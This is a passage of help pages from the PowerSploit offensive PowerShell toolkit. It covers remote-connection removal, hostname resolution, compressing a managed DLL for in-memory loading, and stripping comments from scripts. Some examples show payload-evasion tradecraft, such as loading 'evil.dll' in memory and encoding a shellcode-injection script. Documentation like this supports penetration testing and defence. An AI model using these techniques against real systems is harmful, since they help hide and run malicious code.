42 | @('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
43 | ```
44 |
45 | ## PARAMETERS
46 |
47 | ### -ComputerName
48 | Specifies the system to remove a \\\\ComputerName\IPC$ connection for.
49 |
50 | ```yaml
51 | Type: String[]
52 | Parameter Sets: ComputerName
53 | Aliases: HostName, dnshostname, name
54 |
55 | Required: True
56 | Position: 1
57 | Default value: None
58 | Accept pipeline input: True (ByPropertyName, ByValue)
59 | Accept wildcard characters: False
60 | ```
61 |
62 | ### -Path
63 | Specifies the remote \\\\UNC\path to remove the connection for.
64 |
65 | ```yaml
66 | Type: String[]
67 | Parameter Sets: Path
68 | Aliases:
69 |
70 | Required: True
71 | Position: 1
72 | Default value: None
73 | Accept pipeline input: False
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ## INPUTS
78 |
79 | ## OUTPUTS
80 |
81 | ## NOTES
82 |
83 | ## RELATED LINKS
84 |
85 |
--------------------------------------------------------------------------------
/docs/Recon/Resolve-IPAddress.md:
--------------------------------------------------------------------------------
1 | # Resolve-IPAddress
2 |
3 | ## SYNOPSIS
4 | Resolves a given hostename to its associated IPv4 address.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Resolve-IPAddress [[-ComputerName] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Resolves a given hostename to its associated IPv4 address using
18 | \[Net.Dns\]::GetHostEntry().
19 | If no hostname is provided, the default
20 | is the IP address of the localhost.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Resolve-IPAddress -ComputerName SERVER
27 | ```
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | @("SERVER1", "SERVER2") | Resolve-IPAddress
32 | ```
33 |
34 | ## PARAMETERS
35 |
36 | ### -ComputerName
37 | {{Fill ComputerName Description}}
38 |
39 | ```yaml
40 | Type: String[]
41 | Parameter Sets: (All)
42 | Aliases: HostName, dnshostname, name
43 |
44 | Required: False
45 | Position: 1
46 | Default value: $Env:COMPUTERNAME
47 | Accept pipeline input: True (ByPropertyName, ByValue)
48 | Accept wildcard characters: False
49 | ```
50 |
51 | ## INPUTS
52 |
53 | ### String
54 |
55 | Accepts one or more IP address strings on the pipeline.
56 |
57 | ## OUTPUTS
58 |
59 | ### System.Management.Automation.PSCustomObject
60 |
61 | A custom PSObject with the ComputerName and IPAddress.
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 |
--------------------------------------------------------------------------------
/docs/ScriptModification/Out-CompressedDll.md:
--------------------------------------------------------------------------------
1 | # Out-CompressedDll
2 |
3 | ## SYNOPSIS
4 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
5 |
6 | PowerSploit Function: Out-CompressedDll
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Out-CompressedDll [-FilePath]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Out-CompressedDll -FilePath evil.dll
26 | ```
27 |
28 | Description
29 | -----------
30 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
31 |
32 | ## PARAMETERS
33 |
34 | ### -FilePath
35 | Specifies the path to a managed executable.
36 |
37 | ```yaml
38 | Type: String
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: True
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 | Only pure MSIL-based dlls can be loaded using this technique.
55 | Native or IJW ('it just works' - mixed-mode) dlls will not load.
56 |
57 | ## RELATED LINKS
58 |
59 | [http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)
60 |
61 |
--------------------------------------------------------------------------------
/docs/ScriptModification/Remove-Comment.md:
--------------------------------------------------------------------------------
1 | # Remove-Comment
2 |
3 | ## SYNOPSIS
4 | Strips comments and extra whitespace from a script.
5 |
6 | PowerSploit Function: Remove-Comment
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ### FilePath (Default)
15 | ```
16 | Remove-Comment [-Path]
17 | ```
18 |
19 | ### ScriptBlock
20 | ```
21 | Remove-Comment [-ScriptBlock]
22 | ```
23 |
24 | ## DESCRIPTION
25 | Remove-Comment strips out comments and unnecessary whitespace from a script.
26 | This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
27 |
28 | A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script.
29 | You rock, Lee!
30 |
31 | ## EXAMPLES
32 |
33 | ### -------------------------- EXAMPLE 1 --------------------------
34 | ```
35 | $Stripped = Remove-Comment -Path .\ScriptWithComments.ps1
36 | ```
37 |
38 | ### -------------------------- EXAMPLE 2 --------------------------
39 | ```
40 | Remove-Comment -ScriptBlock {
41 | ```
42 |
43 | ### This is my awesome script.
44 | My documentation is beyond reproach!
45 | Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
46 | ### End script awesomeness
47 | }
48 |
49 | Write-Host 'Hello, World!'
50 |
51 | ### -------------------------- EXAMPLE 3 --------------------------
52 | ```
53 | Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand
54 | ```
55 |
56 | Description
57 | -----------
58 | Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.
59 |
60 | ## PARAMETERS
61 |
62 | ### -Path
63 | Specifies the path to your script.
64 |
65 | ```yaml
66 | Type: String
67 | Parameter Sets: FilePath
68 | Aliases:
69 |
70 | Required: True
71 | Position: 1
72 | Default value: None
73 | Accept pipeline input: False
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ### -ScriptBlock
78 | Specifies a scriptblock containing your script.
79 |
80 | ```yaml
81 | Type: ScriptBlock
82 | Parameter Sets: ScriptBlock
83 | Aliases:
84 |
85 | Required: True
86 | Position: 1
87 | Default value: None
88 | Accept pipeline input: True (ByValue)
89 | Accept wildcard characters: False
90 | ```
91 |
92 | ## INPUTS
93 |
94 | ### System.String, System.Management.Automation.ScriptBlock
95 |
96 | Accepts either a string containing the path to a script or a scriptblock.
97 |
98 | ## OUTPUTS
99 |
100 | ### System.Management.Automation.ScriptBlock
101 |
102 | Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.
103 |
104 | ## NOTES
105 |
106 | ## RELATED LINKS
107 |
108 | [http://www.exploit-monday.com
109 | http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/]()
110 |
111 |
--------------------------------------------------------------------------------